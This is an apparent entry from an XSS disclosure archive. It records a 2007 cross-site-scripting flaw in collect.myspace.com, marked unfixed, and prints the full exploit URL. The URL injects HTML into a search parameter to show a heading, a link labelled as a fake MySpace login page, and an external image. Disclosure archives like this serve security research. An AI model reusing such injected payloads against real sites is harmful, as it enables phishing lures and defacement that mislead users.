Security researcher Hexspirit, has submitted on 21/03/2007 a cross-site-scripting (XSS) vulnerability affecting collect.myspace.com, which at the time of submission ranked 5 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 22/03/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/03/2007 |
Date published: 22/03/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Hexspirit |
Domain: collect.myspace.com |
Category: XSS |
Pagerank: 5 |
URL: http://collect.myspace.com/index.cfm?fuseaction=classifieds.searchCategory&keyWord="><h1>MySpace%20X SS</h1><A%20HREF="http://www.xssed.com/">XSS%20(Fake%20myspace.com%20login%20page)<br><img%20src="ht tp://img62.imageshack.us/img62/4615/stallowned3hb.jpg"></A><br><input%20type="text"%20value="Hexspir it"%20/><br><marquee>ROTFL!%20LMAO!%20OMG!</marquee> |
Click here to view the mirror
|
|
|